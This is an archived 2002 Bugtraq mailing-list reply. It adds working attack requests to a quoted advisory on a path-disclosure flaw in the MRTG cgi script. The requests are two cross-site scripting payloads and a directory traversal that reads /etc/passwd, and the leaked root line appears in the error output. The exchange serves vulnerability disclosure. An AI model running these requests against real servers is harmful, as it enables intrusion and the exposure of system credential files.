[24112] in bugtraq
Re: Mrtg Path Disclosure Vulnerability
daemon@ATHENA.MIT.EDU (Frog Man)
Mon Feb 4 20:42:50 2002
From: "Frog Man" <leseulfrog@hotmail.com>
To: ts@securityoffice.net
Cc: bugtraq@securityfocus.com
Date: Mon, 04 Feb 2002 21:09:18 +0100
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F92E6l7GWzG7JEKVb5N000165f6@hotmail.com>
/mrtg.cgi?log=<script>alert('CSS')</script>
/mrtg.cgi?log=<script>alert('Cross Site Scripting')</script>
/mrtg.cgi?cfg=../../etc/passwd :
------------------- mrtg.cgi error ------------------------
Software error:
ERROR: CFG Error Unknown Option "root:PASS:0:0:root:/root" on line 2 or
above. Check doc/reference.txt for Help
------------------- mrtg.cgi error ------------------------
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>Mrtg Path Disclosure Vulnerability
>
>Type:
>Input Validation Error
>
>Release Date:
>February 4, 2002
>
>Product / Vendor:
>The Multi Router Traffic Grapher (Mrtg) is a tool to monitor the
>traffic load on network-links. Mrtg generates html pages containing
>gif images which provide a live visual representation of this
>traffic.
>
>http://www.mrtg.org
>
>Summary:
>If an attacker submits a web request containing unexpected arguments
>for script variables, an error message will be displayed containing
>the path to the webroot directory of the server running the Mrtg cgi
>script.
>
>http://host/mrtg.cgi?cfg=blabla
>
>Tested:
>Mrtg v2.090011
>Mrtg v2.090006
>
>Vulnerable:
>Mrtg v2.090011
>Mrtg v2.090006
>
>And may be other.
>
>Disclaimer:
>http://www.securityoffice.net is not responsible for the misuse or
>illegal use of any of the information and/or the software listed on
>this security advisory.
>
>Author:
>Tamer Sahin
>ts@securityoffice.net
>http://www.securityoffice.net
>
>Tamer Sahin
>http://www.securityoffice.net
>PGP Key ID: 0x2B5EDCB0 Fingerprint:
>B96A 5DFC E0D9 D615 8D28 7A1B BB8B A453 2B5E DCB0
>
>-----BEGIN PGP SIGNATURE-----
>Version: PGP 7.1
>
>iQA/AwUBPF3TbLuLpFMrXtywEQIU5QCghYmngYvhwveU+8W3JwTz5QtsmU0AoJZD
>Tbl6HDhKVnFPEy1DSB3/q3AH
>=+kUc
>-----END PGP SIGNATURE-----
>
>
>
>
_________________________________________________________________
Téléchargez MSN Explorer gratuitement à l'adresse
http://explorer.msn.fr/intl.asp.
